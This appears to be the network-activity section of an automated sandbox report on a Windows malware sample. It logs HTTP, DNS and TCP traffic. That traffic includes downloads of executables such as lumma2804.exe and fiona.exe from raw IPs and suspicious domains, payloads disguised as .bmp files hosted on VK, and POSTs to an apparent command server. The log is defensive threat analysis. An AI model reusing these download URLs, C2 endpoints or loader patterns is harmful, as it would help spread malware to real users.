Source: global traffic HTTP traffic detected: GET /1nhuM4.js HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: iplogger.org
Source: global traffic HTTP traffic detected: GET /1pRXr7.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: iplis.ru
Source: global traffic HTTP traffic detected: GET /1BV4j7.mp4 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: iplis.ru
Source: global traffic HTTP traffic detected: GET /widget/demo/149.18.24.96 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=149.18.24.96 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic HTTP traffic detected: GET /widget/demo/149.18.24.96 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /widget/demo/149.18.24.96 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=149.18.24.96 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=149.18.24.96 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic HTTP traffic detected: GET /widget/demo/149.18.24.96 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=149.18.24.96 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic HTTP traffic detected: GET /widget/demo/149.18.24.96 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=149.18.24.96 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic HTTP traffic detected: GET /widget/demo/149.18.24.96 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=149.18.24.96 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic HTTP traffic detected: GET /api/bing_release.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.10
Source: global traffic HTTP traffic detected: POST /api/flash.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 113Host: 5.42.66.10
Source: global traffic HTTP traffic detected: POST /api/flash.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 133Host: 5.42.66.10
Source: global traffic HTTP traffic detected: HEAD /download/th/retail.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.10Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /padla/fiona.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 193.233.132.139Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /dl.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 185.172.128.203Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /download/123p.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.10Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /qwqw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: sextipolar.sbsCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dl.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 185.172.128.203Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /download/th/getimage12.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.10Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /padla/fiona.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 193.233.132.139Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /download/th/space.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.10Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download/th/retail.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.10Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download/123p.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.10Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /qwqw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: sextipolar.sbsCache-Control: no-cacheCookie: _subid=2aviuam2b4oin; 3c8e6=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjMwMFwiOjE3MTQ1NDU2MjF9LFwiY2FtcGFpZ25zXCI6e1wiMjVcIjoxNzE0NTQ1NjIxfSxcInRpbWVcIjoxNzE0NTQ1NjIxfSJ9.CqbM3pEsvxuFlcasa8wVpwytEIdy4QAkgAWzI6-JAZE
Source: global traffic HTTP traffic detected: HEAD /upd/index.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: pofix.redCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download/th/getimage12.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.10Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /upd/index.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: pofix.redCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download/th/space.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.10Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /api/flash.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 261Host: 5.42.66.10
Source: global traffic HTTP traffic detected: POST /api/flash.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 645Host: 5.42.66.10
Source: global traffic HTTP traffic detected: HEAD /lumma2804.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 193.233.132.253Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /lumma2804.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 193.233.132.253Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.10
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.139
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.203
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe Code function: 7_2_0041E220 recv,setsockopt,recv,WSAGetLastError,recv,recv,setsockopt,recv,recv,recv,__Xtime_get_ticks,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,Sleep,Sleep, 7_2_0041E220
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: api.myip.com
Source: global traffic HTTP traffic detected: GET /widget/demo/149.18.24.96 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /7725eaa6592c80f8124e769b4e8a07f7.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: zanzibarpivo.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /cad54ba5b01423b1af8ec10ab5719d97.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: triedchicken.netCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /style/060.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: dod.fastbutters.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /038bcf3a84a6c65c7cd47ac3b64b7f9b/7725eaa6592c80f8124e769b4e8a07f7.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: cheremushki.netConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /038bcf3a84a6c65c7cd47ac3b64b7f9b/cad54ba5b01423b1af8ec10ab5719d97.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: carthewasher.netConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /qwqw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sextipolar.sbsConnection: Keep-AliveCookie: _subid=2aviuam2b4oin; 3c8e6=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjMwMFwiOjE3MTQ1NDU2MjF9LFwiY2FtcGFpZ25zXCI6e1wiMjVcIjoxNzE0NTQ1NjIxfSxcInRpbWVcIjoxNzE0NTQ1NjIxfSJ9.CqbM3pEsvxuFlcasa8wVpwytEIdy4QAkgAWzI6-JAZE
Source: global traffic HTTP traffic detected: GET /525403/setup.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: monoblocked.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /525403/setup.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: f.123654987.xyzConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /doc5294803_668776833?hash=0O6PF91bZH66jRdVdr0Yhs0vV73FDPMFrSckqwaaZuH&dl=PH90vp0b08GcZph4ge7Tw9b9Uj3c1wFnC01nFynmnNL&api=1&no_preview=1#ww11 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /doc5294803_669146636?hash=oOxNOsTOdJPrmnDMbC1WPJr0rvKjkZ1hobtPAeSmhS0&dl=r9dUuCDHeIUqlREMZideAXmDqLSX2CxI5qdKmkcx3po&api=1&no_preview=1#cap HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /doc5294803_668917518?hash=HcqSqB4BEz69zZduDzHpG5p3oDuUGmC4h5HdrueZTFD&dl=73Wmq1mPcIfGe320FelzdYt7foFKatzHUAXVPKOvEz0&api=1&no_preview=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /c909328/u5294803/docs/d50/141d7a9868fe/grwg_20240501083043.bmp?extra=LlcaPpnlc3Nm2YJa_HIxTuy8pxFR3cOfTp20BZVPqWbia3-pjLZINmv48VErXBJArrURXJc9wcRab86W2hl73jhKe_zRspSlR2tyoxWE2filhre49hjiCvIckuUXGOOQUBkTv6pEvBQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sun6-20.userapi.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /doc5294803_669132669?hash=ZKjz6ih7UQ9lzkD21VhcvrQwcwdE4E0ZYGiugVcv47k&dl=WempMPmw6ufkYnUzfTIoLDfW8XiZgAu8J2F0VsJ9NwT&api=1&no_preview=1#1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /doc5294803_669123201?hash=XDCpjElzxewo4KzTOHuQEMVCKwzlHqQzBJyb5YKd2Jc&dl=cOyLY32AZWRaWIUaV6LVF1KVnbsjSHxC1w6esY9lvXc&api=1&no_preview=1#mene HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /c237031/u5294803/docs/d48/faa96ddc856f/BotClient_make.bmp?extra=-QkfenqPxrvYtmrTIqBQ0mVeqEu8ubnNU1NG8tGGtw3-QFsDYjvYp64yJnpB_OcMg0uhKlG1RASme310Qax8_egiLSt12hVPF9Wl3DN6qYLOxmECHbAL6mz2NgJ9qEZNdnWZ6unUcjI HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sun6-20.userapi.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /doc5294803_669074803?hash=gtxjyDdukAIKxlWY09AIJPG5gj5TRTjhoVyhzgbP72o&dl=A9s6LaMpuQCyacGXT0hxzf0MvaBJbV8eIlyefAe3TSw&api=1&no_preview=1#xin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /c909218/u5294803/docs/d8/57e1b3af3092/crypted.bmp?extra=Gxkm1-qUj4gTylzhygF0ymDxXHL811_5cKi0pGRSmNbB8xbMKVlvz1Dj_tciMVuEusahBVGi1kGq7gOCAviXVpJzhtwg5lCSO-f5sXIwePQ4Q0UjpInqDSzvgoI_tCv82d6g6aUD97c HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sun6-22.userapi.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /c236331/u5294803/docs/d47/5d64691d2964/crypted.bmp?extra=kGc4Kw6r3KNmnJcNsZNoeqzxsyU48VGtKMsa8v9e4LEHURc7u4wFMmsoHQSLycKdnKbLmB8U76u1qw4WomWhiyKAlTZiZ2p3djsH9911hBclkSW3TQfktfGI1iuTmpkRbaERsG2JfXY HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sun6-20.userapi.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /doc329118071_676158749?hash=wJqTXfnxe0acmwC4vumRgawHgxCuE6EviXjICmkirIT&dl=YVEMDGiurKsySjR8YhvL7Ks3RZIJ4qJjfFMeqQgdrQ8&api=1&no_preview=1#ww12 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /c237231/u5294803/docs/d14/fab319a9eaa9/file.bmp?extra=XekPvLwajf3zjaY5buJAe3HnfkyeicpSttiDxaJzdLoB5YHmFFoUME6QuSgS26MeSPNwYYaTqVwUYy3Yw-9Wvle-70JE1-Pdb5-fcQuxBseFU0qmjloWPkyYmuqT-KQGgal4YgoTpuk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sun6-21.userapi.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /1aFYp7.mp3 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: iplis.ru
Source: global traffic HTTP traffic detected: GET /1nhuM4.js HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: iplogger.org
Source: global traffic HTTP traffic detected: GET /1pRXr7.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: iplis.ru
Source: global traffic HTTP traffic detected: GET /1BV4j7.mp4 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: iplis.ru
Source: global traffic HTTP traffic detected: GET /profiles/76561199680449169 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /widget/demo/149.18.24.96 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=149.18.24.96 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic HTTP traffic detected: GET /widget/demo/149.18.24.96 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=149.18.24.96 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic HTTP traffic detected: GET /api/bing_release.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.10
Source: global traffic HTTP traffic detected: GET /dl.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 185.172.128.203Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /padla/fiona.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 193.233.132.139Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download/th/retail.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.10Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download/123p.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: 5.42.66.10Cache-Control: no-cache
Source: global traffic DNS traffic detected: DNS query: api.myip.com
Source: global traffic DNS traffic detected: DNS query: ipinfo.io
Source: global traffic DNS traffic detected: DNS query: vk.com
Source: global traffic DNS traffic detected: DNS query: monoblocked.com
Source: global traffic DNS traffic detected: DNS query: dod.fastbutters.com
Source: global traffic DNS traffic detected: DNS query: zanzibarpivo.com
Source: global traffic DNS traffic detected: DNS query: pofix.red
Source: global traffic DNS traffic detected: DNS query: sextipolar.sbs
Source: global traffic DNS traffic detected: DNS query: triedchicken.net
Source: global traffic DNS traffic detected: DNS query: cheremushki.net
Source: global traffic DNS traffic detected: DNS query: carthewasher.net
Source: global traffic DNS traffic detected: DNS query: f.123654987.xyz
Source: global traffic DNS traffic detected: DNS query: sun6-20.userapi.com
Source: global traffic DNS traffic detected: DNS query: sun6-22.userapi.com
Source: global traffic DNS traffic detected: DNS query: sun6-21.userapi.com
Source: global traffic DNS traffic detected: DNS query: iplis.ru
Source: global traffic DNS traffic detected: DNS query: iplogger.org
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic DNS traffic detected: DNS query: db-ip.com
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic DNS traffic detected: DNS query: cskuxgp.net
Source: unknown HTTP traffic detected: POST /api/flash.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 113Host: 5.42.66.10
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 01 May 2024 06:40:21 GMTContent-Type: text/html; charset=utf-8Connection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Wed, 01 May 2024 06:40:21 GMTSet-Cookie: _subid=2aviuam2b4oin; expires=Sat, 01 Jun 2024 06:40:21 GMT; path=/Set-Cookie: 3c8e6=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjMwMFwiOjE3MTQ1NDU2MjF9LFwiY2FtcGFpZ25zXCI6e1wiMjVcIjoxNzE0NTQ1NjIxfSxcInRpbWVcIjoxNzE0NTQ1NjIxfSJ9.CqbM3pEsvxuFlcasa8wVpwytEIdy4QAkgAWzI6-JAZE; expires=Wed, 31 Aug 2078 13:20:42 GMT; path=/Vary: Accept-EncodingCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 87cdc7926b9c2415-IAD
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 01 May 2024 06:40:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Wed, 01 May 2024 06:40:22 GMTSet-Cookie: _subid=2aviuam2b4oj5; expires=Sat, 01 Jun 2024 06:40:22 GMT; path=/Set-Cookie: 3c8e6=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjMwMFwiOjE3MTQ1NDU2MjF9LFwiY2FtcGFpZ25zXCI6e1wiMjVcIjoxNzE0NTQ1NjIxfSxcInRpbWVcIjoxNzE0NTQ1NjIxfSJ9.CqbM3pEsvxuFlcasa8wVpwytEIdy4QAkgAWzI6-JAZE; expires=Wed, 31 Aug 2078 13:20:44 GMT; path=/Vary: Accept-EncodingCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 87cdc79a9dec8791-IAD
Source: WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.203/dl.php
